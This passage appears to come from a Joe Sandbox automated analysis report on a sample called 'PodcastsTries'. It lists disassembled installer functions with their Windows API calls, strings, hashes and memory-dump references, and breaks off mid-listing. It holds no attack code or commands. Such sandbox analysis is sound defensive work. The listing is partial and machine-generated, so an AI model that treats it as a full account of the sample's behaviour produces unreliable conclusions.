                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                          • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                          • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                                          • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                          • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                                          Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID: F$A
                                                                                                                                                                                                                                                                                                          • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                          • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                          Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                          • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                          • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                          Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                          • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                                          • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                          • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                                          Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                          • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                          • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                                          Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                          • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                                          Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                          • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                                          Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                          • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                          • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                          • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                                          Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041AD
